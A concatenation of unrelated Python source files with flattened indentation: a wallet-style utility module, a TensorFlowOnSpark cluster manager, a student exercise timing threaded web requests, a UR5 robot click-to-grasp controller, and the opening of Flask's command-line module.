def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else queue.Queue()
self.get_queue = get_queue if get_queue else queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
def setup_thread_excepthook():
"""
Workaround for `sys.excepthook` thread bug from:
http://bugs.python.org/issue1230540
Call once from the main thread before creating any threads.
"""
init_original = threading.Thread.__init__
def init(self, *args, **kwargs):
init_original(self, *args, **kwargs)
run_original = self.run
def run_with_except_hook(*args2, **kwargs2):
try:
run_original(*args2, **kwargs2)
except Exception:
sys.excepthook(*sys.exc_info())
self.run = run_with_except_hook
threading.Thread.__init__ = init
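# Usage sketch: call once from the main thread before any worker threads are created,
# so exceptions escaping a thread's run() reach sys.excepthook:
#
#   setup_thread_excepthook()
#   threading.Thread(target=some_worker).start()   # some_worker is hypothetical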
def versiontuple(v):
return tuple(map(int, (v.split("."))))
def import_meta(path, validater, load_meta):
try:
with open(path, 'r', encoding='utf-8') as f:
d = validater(json.loads(f.read()))
load_meta(d)
#backwards compatibility for JSONDecodeError
except ValueError:
traceback.print_exc(file=sys.stderr)
raise FileImportFailed(_("Invalid JSON code."))
except BaseException as e:
traceback.print_exc(file=sys.stdout)
raise FileImportFailed(e)
def export_meta(meta, fileName):
try:
with open(fileName, 'w+', encoding='utf-8') as f:
json.dump(meta, f, indent=4, sort_keys=True)
except (IOError, os.error) as e:
traceback.print_exc(file=sys.stderr)
raise FileExportFailed(e)
def make_dir(path, allow_symlink=True):
"""Make directory if it does not yet exist."""
if not os.path.exists(path):
if not allow_symlink and os.path.islink(path):
raise Exception('Dangling link: ' + path)
os.mkdir(path)
os.chmod(path, stat.S_IRUSR | stat.S_IWUSR | stat.S_IXUSR)
TxMinedStatus = NamedTuple("TxMinedStatus", [("height", int),
("conf", int),
("timestamp", int),
("header_hash", str)])
VerifiedTxInfo = NamedTuple("VerifiedTxInfo", [("height", int),
("timestamp", int),
("txpos", int),
("header_hash", str)])
|
TFCluster.py
|
# Copyright 2017 Yahoo Inc.
# Licensed under the terms of the Apache 2.0 license.
# Please see LICENSE file in the project root for terms.
"""
This module provides a high-level API to manage the TensorFlowOnSpark cluster.
There are three main phases of operation:
1. **Reservation/Startup** - reserves a port for the TensorFlow process on each executor, starts a multiprocessing.Manager to
listen for data/control messages, and then launches the Tensorflow main function on the executors.
2. **Data feeding** - *For InputMode.SPARK only*. Sends RDD data to the TensorFlow nodes via each executor's multiprocessing.Manager. PS
nodes will tie up their executors, so they won't receive any subsequent data feeding tasks.
3. **Shutdown** - sends a shutdown control message to the multiprocessing.Managers of the PS nodes and pushes end-of-feed markers into the data
queues of the worker nodes.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import nested_scopes
from __future__ import print_function
import logging
import os
import random
import sys
import threading
import time
from pyspark.streaming import DStream
import pydoop.hdfs as hdfs
from . import reservation
from . import TFManager
from . import TFSparkNode
# status of TF background job
tf_status = {}
class InputMode(object):
"""Enum for the input modes of data feeding."""
TENSORFLOW = 0 #: TensorFlow application is responsible for reading any data.
SPARK = 1 #: Spark is responsible for feeding data to the TensorFlow application via an RDD.
class TFCluster(object):
sc = None
defaultFS = None
working_dir = None
num_executors = None
nodeRDD = None
cluster_id = None
cluster_info = None
cluster_meta = None
input_mode = None
queues = None
server = None
def train(self, dataRDD, num_epochs=0, qname='input'):
"""*For InputMode.SPARK only*. Feeds Spark RDD partitions into the TensorFlow worker nodes
It is the responsibility of the TensorFlow "main" function to interpret the rows of the RDD.
Since epochs are implemented via ``RDD.union()`` and the entire RDD must generally be processed in full, it is recommended
to set ``num_epochs`` to closely match your training termination condition (e.g. steps or accuracy). See ``TFNode.DataFeed``
for more details.
Args:
:dataRDD: input data as a Spark RDD.
:num_epochs: number of times to repeat the dataset during training.
:qname: *INTERNAL USE*.
"""
logging.info("Feeding training data")
assert(self.input_mode == InputMode.SPARK)
assert(qname in self.queues)
assert(num_epochs >= 0)
if isinstance(dataRDD, DStream):
# Spark Streaming
dataRDD.foreachRDD(lambda rdd: rdd.foreachPartition(TFSparkNode.train(self.cluster_info, self.cluster_meta, qname)))
else:
# Spark RDD
# if num_epochs unspecified, pick an arbitrarily "large" number for now
# TODO: calculate via dataRDD.count() / batch_size / max_steps
if num_epochs == 0:
num_epochs = 10
rdds = []
for i in range(num_epochs):
rdds.append(dataRDD)
unionRDD = self.sc.union(rdds)
unionRDD.foreachPartition(TFSparkNode.train(self.cluster_info, self.cluster_meta, qname))
def inference(self, dataRDD, qname='input'):
"""*For InputMode.SPARK only*: Feeds Spark RDD partitions into the TensorFlow worker nodes and returns an RDD of results
It is the responsibility of the TensorFlow "main" function to interpret the rows of the RDD and provide valid data for the output RDD.
This will use the distributed TensorFlow cluster for inferencing, so the TensorFlow "main" function should be capable of inferencing.
Per Spark design, the output RDD will be lazily-executed only when a Spark action is invoked on the RDD.
Args:
:dataRDD: input data as a Spark RDD
:qname: *INTERNAL_USE*
Returns:
A Spark RDD representing the output of the TensorFlow inferencing
"""
logging.info("Feeding inference data")
assert(self.input_mode == InputMode.SPARK)
assert(qname in self.queues)
return dataRDD.mapPartitions(TFSparkNode.inference(self.cluster_info, qname))
def shutdown(self, ssc=None):
"""Stops the distributed TensorFlow cluster.
Args:
:ssc: *For Streaming applications only*. Spark StreamingContext
"""
logging.info("Stopping TensorFlow nodes")
# identify ps/workers
ps_list, worker_list = [], []
for node in self.cluster_info:
if node['job_name'] == 'ps':
ps_list.append(node)
else:
worker_list.append(node)
if ssc is not None:
# Spark Streaming
done = False
while not done:
done = ssc.awaitTerminationOrTimeout(1)
if not done and self.server.done:
logging.info("Server done, stopping StreamingContext")
ssc.stop(stopSparkContext=False, stopGraceFully=True)
done = done or self.server.done
else:
# in TENSORFLOW mode, there is no "data feeding" job, only a "start" job, so we must wait for the TensorFlow workers
# to complete all tasks, while accounting for any PS tasks which run indefinitely.
if self.input_mode == InputMode.TENSORFLOW:
count = 0
done = False
while not done:
st = self.sc.statusTracker()
jobs = st.getActiveJobsIds()
if len(jobs) > 0:
stages = st.getActiveStageIds()
for i in stages:
si = st.getStageInfo(i)
if si.numActiveTasks == len(ps_list):
# if we only have PS tasks left, check that we see this condition a couple times
count += 1
done = (count >= 3)
time.sleep(5)
else:
done = True
# shutdown queues and managers for "worker" executors.
# note: in SPARK mode, this job will immediately queue up behind the "data feeding" job.
# in TENSORFLOW mode, this will only run after all workers have finished.
workers = len(worker_list)
workerRDD = self.sc.parallelize(range(workers), workers)
workerRDD.foreachPartition(TFSparkNode.shutdown(self.cluster_info, self.queues))
# exit Spark application w/ err status if TF job had any errors
if 'error' in tf_status:
logging.error("Exiting Spark application with error status.")
self.sc.cancelAllJobs()
self.sc.stop()
sys.exit(1)
logging.info("Shutting down cluster")
# shutdown queues and managers for "PS" executors.
# note: we have to connect/shutdown from the spark driver, because these executors are "busy" and won't accept any other tasks.
for node in ps_list:
addr = node['addr']
authkey = node['authkey']
m = TFManager.connect(addr, authkey)
q = m.get_queue('control')
q.put(None)
q.join()
# wait for all jobs to finish
done = False
while not done:
time.sleep(5)
st = self.sc.statusTracker()
jobs = st.getActiveJobsIds()
if len(jobs) == 0:
break
def tensorboard_url(self):
"""
Utility function to get Tensorboard URL
"""
tb_url = None
for node in self.cluster_info:
if node['tb_port'] != 0 and node['job_name'] == 'worker' and node['task_index'] == 0:
tb_url = "http://{0}:{1}".format(node['host'], node['tb_port'])
return tb_url
def run(sc, map_fun, tf_args, num_executors, num_ps, tensorboard=False, input_mode=InputMode.TENSORFLOW,
log_dir=None, driver_ps_nodes=False, master_node=None, reservation_timeout=600, queues=['input', 'output', 'error']):
"""Starts the TensorFlowOnSpark cluster and Runs the TensorFlow "main" function on the Spark executors
Args:
:sc: SparkContext
:map_fun: user-supplied TensorFlow "main" function
:tf_args: ``argparse`` args, or command-line ``ARGV``. These will be passed to the ``map_fun``.
:num_executors: number of Spark executors. This should match your Spark job's ``--num_executors``.
:num_ps: number of Spark executors which are reserved for TensorFlow PS nodes. All other executors will be used as TensorFlow worker nodes.
:tensorboard: boolean indicating if the chief worker should spawn a Tensorboard server.
:input_mode: TFCluster.InputMode
:log_dir: directory to save tensorboard event logs. If None, defaults to a fixed path on local filesystem.
    :driver_ps_nodes: run the PS nodes on the driver locally instead of on the spark executors; this helps maximize computing resources (esp. GPU). You will need to set cluster_size = num_executors + num_ps
:master_node: name of the "master" or "chief" node in the cluster_template, used for `tf.estimator` applications.
:reservation_timeout: number of seconds after which cluster reservation times out (600 sec default)
:queues: *INTERNAL_USE*
Returns:
A TFCluster object representing the started cluster.
"""
  # In Hopsworks we always want TensorBoard to be enabled:
  tb = True
logging.info("Reserving TFSparkNodes {0}".format("w/ TensorBoard" if tb else ""))
assert num_ps < num_executors
if driver_ps_nodes:
raise Exception('running PS nodes on driver is not supported and not needed on Hops Hadoop, since we have GPU scheduling.')
if log_dir:
raise Exception('No need to specify log_dir directory, we save TensorBoard events in the directory returned by tensorboard.logdir for you')
# build a cluster_spec template using worker_nums
cluster_template = {}
cluster_template['ps'] = range(num_ps)
if master_node is None:
cluster_template['worker'] = range(num_ps, num_executors)
else:
cluster_template[master_node] = range(num_ps, num_ps + 1)
if num_executors > num_ps + 1:
cluster_template['worker'] = range(num_ps + 1, num_executors)
logging.info("cluster_template: {}".format(cluster_template))
# get default filesystem from spark
defaultFS = sc._jsc.hadoopConfiguration().get("fs.defaultFS")
# strip trailing "root" slash from "file:///" to be consistent w/ "hdfs://..."
if defaultFS.startswith("file://") and len(defaultFS) > 7 and defaultFS.endswith("/"):
defaultFS = defaultFS[:-1]
# get current working dir of spark launch
working_dir = os.getcwd()
# start a server to listen for reservations and broadcast cluster_spec
server = reservation.Server(num_executors)
server_addr = server.start()
# start TF nodes on all executors
logging.info("Starting TensorFlow on executors")
cluster_meta = {
'id': random.getrandbits(64),
'cluster_template': cluster_template,
'num_executors': num_executors,
'default_fs': defaultFS,
'working_dir': working_dir,
'server_addr': server_addr
}
nodeRDD = sc.parallelize(range(num_executors), num_executors)
app_id = sc.applicationId
# start TF on a background thread (on Spark driver) to allow for feeding job
def _start(status):
try:
nodeRDD.foreachPartition(TFSparkNode.run(map_fun,
tf_args,
cluster_meta,
tb,
None,
app_id,
0,
queues,
background=(input_mode == InputMode.SPARK)))
except Exception as e:
logging.error("Exception in TF background thread")
status['error'] = str(e)
t = threading.Thread(target=_start, args=(tf_status,))
# run as daemon thread so that in spark mode main thread can exit
# if feeder spark stage fails and main thread can't do explicit shutdown
t.daemon = True
t.start()
# wait for executors to check GPU presence
logging.info("Waiting for GPU presence check to start")
gpus_present = server.await_gpu_check()
logging.info("All GPU checks completed")
# wait for executors to register and start TFNodes before continuing
logging.info("Waiting for TFSparkNodes to start")
cluster_info = server.await_reservations(sc, tf_status, reservation_timeout)
logging.info("All TFSparkNodes started")
# print cluster_info and extract TensorBoard URL
tb_url = None
for node in cluster_info:
logging.info(node)
if node['tb_port'] != 0:
tb_url = "http://{0}:{1}".format(node['host'], node['tb_port'])
if tb_url is not None:
logging.info("========================================================================================")
logging.info("")
logging.info("TensorBoard running at: {0}".format(tb_url))
logging.info("")
logging.info("========================================================================================")
# since our "primary key" for each executor's TFManager is (host, executor_id), sanity check for duplicates
# Note: this may occur if Spark retries failed Python tasks on the same executor.
tb_nodes = set()
for node in cluster_info:
node_id = (node['host'], node['executor_id'])
if node_id in tb_nodes:
raise Exception("Duplicate cluster node id detected (host={0}, executor_id={1})".format(node_id[0], node_id[1]) +
"Please ensure that:\n" +
"1. Number of executors >= number of TensorFlow nodes\n" +
"2. Number of tasks per executors is 1\n" +
"3, TFCluster.shutdown() is successfully invoked when done.")
else:
tb_nodes.add(node_id)
# create TFCluster object
cluster = TFCluster()
cluster.sc = sc
cluster.meta = cluster_meta
cluster.nodeRDD = nodeRDD
cluster.cluster_info = cluster_info
cluster.cluster_meta = cluster_meta
cluster.input_mode = input_mode
cluster.queues = queues
cluster.server = server
return cluster
|
Assignment5.py
|
import queue
import time
import threading
from urllib.request import urlopen, Request
from concurrent.futures import ThreadPoolExecutor
from queue import Queue, Empty
# https://www.geeksforgeeks.org/how-to-use-threadpoolexecutor-in-python3/
# Threading allows parts of a program to run concurrently. Python has two ways to achieve this:
# the multiprocessing module and the threading module. Multithreading is well suited to speeding
# up I/O-bound tasks such as web requests, database operations, or reading/writing files. In
# contrast, CPU-intensive work such as heavy mathematical computation benefits most from
# multiprocessing, because the GIL (Global Interpreter Lock) prevents Python threads from
# executing bytecode in parallel.
# Header with user agent is needed to allow access for scraping
HEADER = {'User-Agent': 'Mozilla/5.0'}
URLS = ['https://www.volvocars.com/se',
'https://consid.se/',
'https://stackoverflow.com/',
'https://9gag.com/',
'https://www.yahoo.com',
'https://www.reddit.com',
'https://www.youtube.com',
'https://9gag.com/',
'https://twitter.com/',
'https://www.volvocars.com/se',
'https://consid.se/',
'https://www.reddit.com',
'https://www.youtube.com',
'https://stackoverflow.com',
'https://www.aftonbladet.se/',
'https://www.volvocars.com/se',
'https://www.aftonbladet.se/',
'https://www.volvocars.com/se',
'https://www.yahoo.com',
'https://consid.se/',
'https://www.youtube.com',
'https://9gag.com/',
'https://stackoverflow.com/',
'https://www.volvocars.com/se',
'https://www.yahoo.com',
'https://www.reddit.com/',
'https://consid.se/',
'https://9gag.com/',
'https://twitter.com/',
'https://stackoverflow.com/',
'https://www.aftonbladet.se/',
'https://twitter.com/']
def timer(func):
# Timer is a function you might recognize from last week's assignment but
# with a slight modification, this time the decorator returns the execution
# time as well as printing it. This is for gathering the runtime such that
# the functions performances can be compared in the main function
def timer_wrapper(*args):
start = time.time()
func(*args)
end = time.time()
exec_time = end-start
print(f"Execution time: {(exec_time):.7f} seconds ({func.__name__})")
return exec_time
return timer_wrapper
def request_and_open(URL):
# request_and_open sends a request to a URL and fetches the information.
# The functions return value is currently unused and simply there in case
# of if you want to toy around with the information gathered or maybe
# continue building upon the assignment afterwards.
request = Request(URL, headers=HEADER)
url_info_byte = urlopen(request, timeout=20).read()
url_info_string = url_info_byte.decode("utf-8")
return url_info_string # not used..
@timer
def request_single():
for url in URLS:
request_and_open(url)
@timer
def request_pool(num_threads):
# https://www.geeksforgeeks.org/how-to-use-threadpoolexecutor-in-python3/
# In the request_pool function implement a ThreadPoolExecutor. The executor
# is a context manager so use it as such. The executor should then map the
# urls to the request_and_open function using map
with ThreadPoolExecutor(num_threads) as executor:
executor.map(request_and_open, URLS)
@timer
def request_queue(num_threads):
# Create a queue object and put all the urls into it
queue = Queue()
for url in URLS:
queue.put(url)
def worker(queue):
# Define a worker function inside the request_queue function that takes as
# input the queue and calls the request_and_open function. The queue
# should then mark this task as done
        while True:
            try:
                # get_nowait avoids a thread blocking forever on get() if another
                # thread drains the queue between an empty() check and the get()
                url = queue.get_nowait()
            except Empty:
                break
            request_and_open(url)
            queue.task_done()
# Create threads up to the num_threads and place the threads to work on the
# worker queue function. Start the threads ..
for _ in range(num_threads):
threading.Thread(target=worker, args=(queue,)).start()
# .. and then make the main thread wait for the queue to join.
queue.join()
def main():
num_threads = [2, 4, 8, 16, 32, 8192]
num_iterations = 3
mean_times_pool = []
mean_times_queue = []
print(f"Number of threads: 1. Executing...")
# Main runs the three different request functions and gathers the runtime
# for each of the functions
total_time_single = sum(request_single() for _ in range(num_iterations))
# and then obtains the mean runtime by dividing
# with the number of iterations.
mean_time_single = total_time_single/num_iterations
for i in num_threads:
# In the for-loop that iterates over num_threads the request_pool and
# request_queue functions are called using varying number of threads.
# This is one of the main focuses of the assignment, which is to judge
# how number of threads improve or decreases performance and compare
# the Threadpool approach with the queue.
print(f"Number of threads: {i}. Executing...")
total_time_pool = sum(request_pool(i) for _ in range(num_iterations))
total_time_queue = sum(request_queue(i) for _ in range(num_iterations))
mean_times_pool.append(total_time_pool/num_iterations)
mean_times_queue.append(total_time_queue/num_iterations)
print(f"The mean time using single thread: {mean_time_single}")
print(f"The mean times using thread pool executor are: {mean_times_pool}")
print(f"The mean times using queue.Queue workers are: {mean_times_queue}")
if __name__ == "__main__":
main()
'''
Output:
The mean time using single thread: 19.091560920079548
num_threads:
>> [2, 4, 8, 16, 32, 8192]
The mean times using thread pool executor are:
>> [8.89, 5.34, 3.10, 2.44, 4.09, 4.63]
The mean times using queue.Queue workers are:
>> [9.80, 7.51, 3.69, 3.65, 4.77, 10.76]
Fastest here: ThreadPoolExecutor with 16 threads
'''
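# A small optional helper sketch (not part of the original solution): instead of
# reading the fastest configuration off the printed lists, main() could call
# fastest_configuration(num_threads, mean_times_pool) to pick it out directly.
def fastest_configuration(thread_counts, mean_times):
    # Return the (thread_count, mean_time) pair with the lowest mean runtime.
    return min(zip(thread_counts, mean_times), key=lambda pair: pair[1])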
|
touch.py
|
#!/usr/bin/env python
import matplotlib.pyplot as plt
import numpy as np
import time
import cv2
from robot import Robot
import threading
import os
import utils
class HumanControlOfRobot(object):
"""Creates a color and depth opencv window from the robot camera, gets human keyboard/click, and moves the robot.
Keyboard Controls:
'c': set self.stop to True indicating it is time to exit the program.
'a': autonomous mode, sets self.human_control = False, clicks will have no effect (unless move_robot=False).
'z': human control mode, sets self.human_control = True, clicks will move the robot (unless move_robot=False).
'h': go home.
'j': stay in place after pushing, grasping, and placing (self.go_home=False).
'm': Automatically home when pushing, grasping, and placing (self.go_home=True).
'g': set self.action = 'grasp', left click in the 'color' image window will do a grasp action.
'p': set self.action = 'place', left click will do a place action.
's': set self.action = 'push', left click will slide the gripper across the ground, aka a push action.
't': set self.action = 'touch', left click will do a touch action (go to a spot and stay there).
'r': repeat the previous action and click location after applying any settings changes you made to action/angle.
'1-9': Set the gripper rotation orientation at 45 degree increments, starting at the angle 0. Default is '5'.
'b': set self.action = box, left click will move the robot to go get the box and dump the objects inside.
'[': set self.robot.place_task = False, a successful grasp will immediately drop objects in the box.
']': set self.robot.place_task = True, a successful grasp will hold on to objects so the robot can place them.
' ': print the current robot cartesian position with xyz and axis angle and the current joint angles.
'-': close gripper
'=': open gripper
'k': calibrate with the ros api in calibrate_ros.py
Member Variables:
self.stop: if True shut down your program, pressing 'c' on the keyboard sets this variable to True.
"""
def __init__(self, robot=None, action='touch', human_control=True, mutex=None, move_robot=True):
self.stop = False
self.print_state_count = 0
self.tool_orientation = [0.0, np.pi, 0.0] # Real Good Robot
self.human_control = human_control
self.move_robot = move_robot
self.action = action
self.click_count = 0
self.click_position = None
self.target_position = None
# go home automatically during push, grasp place actions
self.go_home = True
self.calib = None
if robot is None:
# workspace_limits = np.asarray([[0.3, 0.748], [-0.224, 0.224], [-0.255, -0.1]]) # Cols: min max, Rows: x y z (define workspace limits in robot coordinates)
# self.tool_orientation = [2.22,-2.22,0]
# ---------------------------------------------
# Move robot to home pose
self.robot = Robot(False, None, None, workspace_limits,
tcp_host_ip, tcp_port, rtc_host_ip, rtc_port,
False, None, None)
            self.robot.open_gripper()
else:
self.robot = robot
# Slow down robot
# robot.joint_acc = 1.4
# robot.joint_vel = 1.05
self.grasp_angle = 4.0
self.grasp_success, self.grasp_color_success = False, False
        if mutex is None:
            self.mutex = threading.Lock()
        else:
            self.mutex = mutex
# Callback function for clicking on OpenCV window
self.click_point_pix = ()
# wait a second for things to initialize
time.sleep(1)
        self.camera_color_img, self.camera_depth_img = self.robot.get_camera_data(go_home=False)
def mouseclick_callback(event, x, y, flags, param):
if event == cv2.EVENT_LBUTTONDOWN or event == cv2.EVENT_RBUTTONDOWN:
# global camera, robot, self.click_point_pix, action, self.grasp_angle, self.grasp_success, self.grasp_color_success, self.mutex
self.click_point_pix = (x,y)
# Get click point in camera coordinates
click_z = self.camera_depth_img[y][x] * robot.cam_depth_scale * 1000 # unit from m -> mm
click_x = np.multiply(x-robot.cam_intrinsics[0][2],click_z/robot.cam_intrinsics[0][0])
click_y = np.multiply(y-robot.cam_intrinsics[1][2],click_z/robot.cam_intrinsics[1][1])
if click_z == 0:
print('Click included invalid camera data, ignoring the command.')
return
click_point = np.asarray([click_x,click_y,click_z]) / 1000 # Convert from unit from mm to m
click_point.shape = (3,1)
# Convert camera to robot coordinates
# camera2robot = np.linalg.inv(robot.cam_pose)
camera2robot = robot.cam_pose # The transformation matrix is from meter to meter
target_position = np.dot(camera2robot[0:3,0:3],click_point) + camera2robot[0:3,3:]
target_position = target_position[0:3,0]
heightmap_rotation_angle = self.grasp_angle * np.pi / 4
# print(target_position, self.tool_orientation)
if not self.human_control:
print('Human Control is disabled, press z for human control mode, a for autonomous mode')
with self.mutex:
self.click_position = target_position.copy()
self.target_position, heightmap_rotation_angle = self.execute_action(target_position, heightmap_rotation_angle)
# Show color and depth frames
cv2.namedWindow('depth')
cv2.namedWindow('color')
cv2.setMouseCallback('color', mouseclick_callback)
self.print_config()
def execute_action(self, target_position, heightmap_rotation_angle):
self.target_position = target_position
self.click_count += 1
print(str(self.click_count) + ': action: ' + str(self.action) + ' pos: ' + str(target_position) + ' rot: ' + str(heightmap_rotation_angle))
def grasp(tp, ra, gh):
# global self.grasp_success, self.grasp_color_success, self.mutex
with self.mutex:
self.grasp_success, self.grasp_color_success = robot.grasp(tp, ra, go_home=gh)
def place(tp, ra, gh):
# global self.grasp_success, self.mutex
with self.mutex:
self.robot.place(tp, ra, go_home=gh)
self.grasp_success = False
if self.action == 'touch':
# Move the gripper up a bit to protect the gripper (Real Good Robot)
def move_to(tp, ra):
# global self.mutex
tp = tp.copy()
# move to a spot just above the clicked spot to avoid collision
tp[-1] += 0.04
with self.mutex:
# self.robot.move_to(target_position, self.tool_orientation)
self.robot.move_to(tp, heightmap_rotation_angle=ra)
if self.move_robot:
t = threading.Thread(target=move_to, args=(target_position, heightmap_rotation_angle))
t.start()
elif self.action == 'grasp':
            if not self.robot.place_task or (self.robot.place_task and not self.grasp_success):
if self.move_robot:
t = threading.Thread(target=grasp, args=(target_position, heightmap_rotation_angle, self.go_home))
t.start()
else:
if self.move_robot:
t = threading.Thread(target=place, args=(target_position, heightmap_rotation_angle, self.go_home))
t.start()
elif self.action == 'box':
t = threading.Thread(target=lambda: self.robot.restart_real())
t.start()
elif self.action == 'push':
target_position[-1] += 0.01
t = threading.Thread(target=lambda: self.robot.push(target_position, heightmap_rotation_angle, go_home=self.go_home))
t.start()
elif self.action == 'place':
target_position[-1] += 0.01
t = threading.Thread(target=lambda: self.robot.place(target_position, heightmap_rotation_angle, go_home=self.go_home))
t.start()
return target_position, heightmap_rotation_angle
def print_config(self):
# global robot
state_str = 'Current action: ' + str(self.action) + '. '
state_str += 'Grasp, HOLD, PLACE object task, ' if self.robot.place_task else 'Grasp then drop in box task, '
state_str += 'robot WILL go home after push/grasp/place' if self.go_home else 'robot will NOT go home after push/grasp/place'
print(state_str)
def run_one(self, camera_color_img=None, camera_depth_img=None):
if camera_color_img is None:
shape = [0, 0, 0, 0]
# get the camera data, but make sure all the images are valid first
while not all(shape):
self.camera_color_img, self.camera_depth_img = self.robot.get_camera_data(go_home=False)
shape = self.camera_color_img.shape + self.camera_depth_img.shape
else:
self.camera_color_img = camera_color_img
self.camera_depth_img = camera_depth_img
if len(self.click_point_pix) != 0:
self.camera_color_img = cv2.circle(self.camera_color_img, self.click_point_pix, 7, (0,0,255), 2)
self.camera_color_img = cv2.cvtColor(self.camera_color_img, cv2.COLOR_RGB2BGR)
cv2.imshow('color', self.camera_color_img)
cv2.imshow('depth', self.camera_depth_img)
key = cv2.waitKey(1)
# Configure the system
# Numbers 1-9 are orientations of the gripper
# t is touch mode, where the robot will go to the clicked spot
if key == ord('1'):
self.grasp_angle = 0.0
elif key == ord('2'):
self.grasp_angle = 1.0
elif key == ord('3'):
self.grasp_angle = 2.0
elif key == ord('4'):
self.grasp_angle = 3.0
elif key == ord('5'):
self.grasp_angle = 4.0
elif key == ord('6'):
self.grasp_angle = 5.0
elif key == ord('7'):
self.grasp_angle = 6.0
elif key == ord('8'):
self.grasp_angle = 7.0
elif key == ord('9'):
self.grasp_angle = 8.0
elif key == ord('t'):
self.action = 'touch'
self.print_config()
elif key == ord('g'):
self.action = 'grasp'
self.print_config()
elif key == ord('s'):
self.action = 'push'
self.print_config()
elif key == ord('p'):
self.action = 'place'
self.print_config()
elif key == ord('b'):
self.action = 'box'
self.print_config()
elif key == ord('r'):
heightmap_rotation_angle = self.grasp_angle * np.pi / 4
with self.mutex:
self.target_position, heightmap_rotation_angle = self.execute_action(self.click_position.copy(), heightmap_rotation_angle)
elif key == ord(']'):
with self.mutex:
# Mode for stacking blocks
self.robot.place_task = True
self.print_config()
elif key == ord('['):
with self.mutex:
# Mode for grasping to hold and then place
self.robot.place_task = False
self.print_config()
elif key == ord(' '):
with self.mutex:
# print the robot state
self.print_state_count += 1
state_data = self.robot.get_state()
actual_tool_pose = self.robot.parse_tcp_state_data(state_data, 'cartesian_info')
robot_state = 'UR5 axis/angle cart_pose format: ' + str(actual_tool_pose)
actual_tool_pose = utils.axis_angle_and_translation_to_rigid_transformation(actual_tool_pose[:3], actual_tool_pose[3:])
joint_position = self.robot.parse_tcp_state_data(state_data, 'joint_data')
robot_state += ' joint pos: ' + str(joint_position) + ' homogeneous cart_pose: ' + str(actual_tool_pose)
print(str(self.print_state_count) + ' ' + robot_state)
elif key == ord('c'):
self.stop = True
elif key == ord('h'):
with self.mutex:
t = threading.Thread(target=lambda: self.robot.go_home())
t.start()
elif key == ord('-'):
with self.mutex:
t = threading.Thread(target=lambda:
print('fully closed: ' + str(self.robot.close_gripper()) + ' obj detected: ' + str(self.robot.gripper.object_detected())))
t.start()
elif key == ord('='):
with self.mutex:
t = threading.Thread(target=lambda: self.robot.open_gripper())
t.start()
elif key == ord('m'):
self.go_home = True
self.print_config()
elif key == ord('j'):
self.go_home = False
self.print_config()
elif key == ord('z'):
self.human_control = True
elif key == ord('a'):
self.human_control = False
elif key == ord('k'):
from calibrate_ros import Calibrate
            self.robot.camera.subscribe_aruco_tf()
            self.robot.go_home()
calib = Calibrate(robot=self.robot)
# calib.test()
calib.calibrate()
# def calibration():
# from calibrate_ros import Calibrate
# robot.camera.subscribe_aruco_tf()
# robot.go_home()
# calib = Calibrate(robot=self.robot)
# # calib.test()
# calib.calibrate()
# with self.mutex:
# t = threading.Thread(target=calibration)
# t.start()
    def run(self):
        """Blocking call that repeatedly calls run_one() until self.stop is set."""
        while not self.stop:
            self.run_one()
def get_action(self, camera_color_img=None, camera_depth_img=None, prev_click_count=None, block=True):
""" Get a human specified action
# Arguments
camera_color_img: show the human user a specific color image
camera_depth_img: show the human user a specific depth image
prev_click_count: pass the click count you saw most recently, used to determine if the user clicked in between calls to get_action.
block: when True this function will loop and get keypresses via run_one() until a click is received, when false it will just immediately return the current state.
# Returns
[action_name, target_position, grasp_angle, cur_click_count, camera_color_img, camera_depth_img]
"""
running = True
if prev_click_count is None:
with self.mutex:
prev_click_count = self.click_count
while running:
self.run_one(camera_color_img, camera_depth_img)
with self.mutex:
cur_click_count = self.click_count
action = self.action
target_position = self.target_position
grasp_angle = self.grasp_angle
if running:
running = not self.stop
if not block:
running = False
elif cur_click_count > prev_click_count:
running = False
if camera_color_img is None:
with self.mutex:
camera_color_img = self.camera_color_img
camera_depth_img = self.camera_depth_img
return action, target_position, grasp_angle, cur_click_count, camera_color_img, camera_depth_img
def __del__(self):
cv2.destroyAllWindows()
if __name__ == '__main__':
# User options (change me)
# --------------- Setup options ---------------
tcp_host_ip = '192.168.1.155' # IP and port to robot arm as TCP client (UR5)
tcp_port = 30002
rtc_host_ip = '192.168.1.155' # IP and port to robot arm as real-time client (UR5)
rtc_port = 30003
# action = 'touch'
action = 'grasp'
if action == 'touch':
# workspace_limits = np.asarray([[0.5, 0.75], [-0.3, 0.1], [0.17, 0.3]]) # Real Good Robot
workspace_limits = None
elif action == 'grasp':
workspace_limits = None
else:
raise NotImplementedError
is_sim = False
if is_sim:
tcp_port = 19997
calibrate = False
# Move robot to home pose
robot = Robot(is_sim, None, None, workspace_limits,
tcp_host_ip, tcp_port, rtc_host_ip, rtc_port,
False, None, None, place=True, calibrate=calibrate)
# if is_sim:
# robot.add_objects()
hcr = HumanControlOfRobot(robot, action=action)
hcr.run()
# while not hcr.stop:
# # hcr.run_one()
# hcr.get_action()
# cv2.destroyAllWindows()
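# Minimal usage sketch (an illustrative assumption, never called here): an
# external planner could poll get_action() instead of calling hcr.run(), e.g.
def example_get_action_loop(hcr):
    last_click_count = None
    while not hcr.stop:
        # block=False returns the current UI state immediately, so the caller
        # can interleave its own planning or logging between polls.
        action, target, angle, last_click_count, color_img, depth_img = hcr.get_action(
            prev_click_count=last_click_count, block=False)
        if target is not None:
            print('human requested', action, 'at', target, 'rotation', angle)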
|
cli.py
|
# -*- coding: utf-8 -*-
"""
flask.cli
~~~~~~~~~
A simple command line application to run flask apps.
:copyright: (c) 2015 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import os
import sys
from threading import Lock, Thread
from functools import update_wrapper
import click
from ._compat import iteritems, reraise
from .helpers import get_debug_flag
from . import __version__
class NoAppException(click.UsageError):
"""Raised if an application cannot be found or loaded."""
def find_best_app(module):
"""Given a module instance this tries to find the best possible
application in the module or raises an exception.
"""
from . import Flask
# Search for the most common names first.
for attr_name in 'app', 'application':
app = getattr(module, attr_name, None)
if app is not None and isinstance(app, Flask):
return app
# Otherwise find the only object that is a Flask instance.
matches = [v for k, v in iteritems(module.__dict__)
if isinstance(v, Flask)]
if len(matches) == 1:
return matches[0]
raise NoAppException('Failed to find application in module "%s". Are '
